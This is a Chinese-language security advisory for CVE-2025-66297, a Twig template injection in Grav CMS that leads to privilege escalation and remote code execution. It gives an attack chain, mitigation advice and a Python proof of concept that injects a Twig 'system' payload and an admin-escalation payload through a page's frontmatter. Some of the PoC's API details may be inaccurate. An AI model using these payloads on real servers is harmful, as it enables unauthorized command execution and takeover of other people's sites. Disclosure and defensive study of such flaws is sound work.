CVE-2025-66297: Grav CMS Twig注入导致权限提升和远程代码执行

漏洞信息

漏洞编号

CVE-2025-66297

漏洞类型

权限提升,远程代码执行,Twig模板注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Grav CMS

漏洞概述

CVE-2025-66297是Grav CMS中的一个高危安全漏洞，CVSS评分8.8。该漏洞影响Grav CMS 1.8.0-beta.27之前的所有版本。漏洞的核心问题在于Grav CMS允许具有admin面板访问权限且拥有创建或编辑页面权限的用户，在页面的frontmatter中启用Twig处理功能。攻击者可以利用这一特性注入恶意的Twig表达式，从而实现权限提升和远程代码执行。具体而言，攻击者通过在frontmatter中注入特定的Twig代码，可以将自身权限提升为管理员级别，或者利用scheduler API执行任意系统命令。该漏洞被归类为CWE-94（代码注入）和CWE-269（权限提升），对系统的机密性、完整性和可用性都造成严重影响。漏洞已于2025年12月1日披露，并在1.8.0-beta.27版本中得到修复。建议所有使用受影响版本的用户立即升级到最新版本或采取临时缓解措施。

技术细节

该漏洞的技术原理涉及Grav CMS的Twig模板处理机制和权限验证缺陷。在Grav CMS中，Twig是一种常用的模板引擎，用于动态生成页面内容。系统允许在页面的frontmatter元数据中配置Twig处理选项。攻击者首先需要获取具有admin面板访问权限的账户，并拥有创建或编辑页面的权限。通过创建或编辑页面，攻击者可以在frontmatter中设置相关参数以启用Twig处理功能。随后，攻击者可以在页面内容中注入恶意的Twig表达式，例如利用{{7*7}}进行测试，或注入更复杂的payload来执行系统命令。另一种攻击路径是利用scheduler API，通过Twig注入实现任意系统命令执行。该漏洞的利用不需要任何用户交互（UI:N），攻击者可以直接通过网络远程利用（AV:N）。由于认证要求为低权限（PR:L），任何具有基本编辑权限的用户都可能成为潜在攻击者。成功利用后，攻击者可以完全控制服务器，执行任意代码，安装后门，或窃取敏感数据。

攻击链分析

STEP 1

步骤1

获取具有admin面板访问权限的账户，并确保拥有创建或编辑页面的权限

STEP 2

步骤2

登录Grav CMS管理后台，导航到页面创建或编辑功能

STEP 3

步骤3

在页面的frontmatter中启用Twig处理（设置twig: true）

STEP 4

步骤4

在页面内容或frontmatter中注入恶意的Twig表达式，如利用system函数执行命令或修改用户权限

STEP 5

步骤5

保存页面并访问该页面，触发Twig表达式执行

STEP 6

步骤6

成功实现权限提升（成为管理员）或远程代码执行（服务器执行任意命令）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66297 PoC - Grav CMS Twig Injection
# This PoC demonstrates privilege escalation and RCE via Twig injection

# Step 1: Create a page with malicious Twig in frontmatter
import requests

target_url = "http://target-grav-site.com"
login_url = f"{target_url}/admin"
page_create_url = f"{target_url}/admin/pages"

# Authentication
session = requests.Session()
login_data = {
    "username": "attacker",
    "password": "password123"
}
session.post(login_url, data=login_data)

# Step 2: Create page with Twig injection payload
page_data = {
    "frontmatter": """---
title: Test Page
twig: true
---
{{['id']|map('system')|join('')}}  # RCE via Twig
""",
    "content": "Malicious content"
}

response = session.post(page_create_url, data=page_data)

# Step 3: Access the crafted page to trigger RCE
malicious_page_url = f"{target_url}/test-page"
response = session.get(malicious_page_url)

# Alternative: Privilege Escalation payload
priv_esc_payload = """---
title: PrivEsc Test
twig: true
---
{{user.username}}  # Information disclosure
{% do user.setAccessLevel('admin') %}  # Privilege escalation
"""

影响范围

Grav CMS < 1.8.0-beta.27

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制admin面板的访问，仅允许可信IP地址访问；2) 禁用或限制具有页面编辑权限的账户；3) 在Web服务器层面添加规则，阻止包含可疑Twig语法（如{{、{%等）的请求；4) 启用审计日志，监控异常的管理员行为和页面修改；5) 考虑暂时关闭Twig模板功能或实施严格的Content Security Policy。需要注意的是，这些措施仅为临时解决方案，无法完全消除风险，最根本的修复仍是升级到最新版本。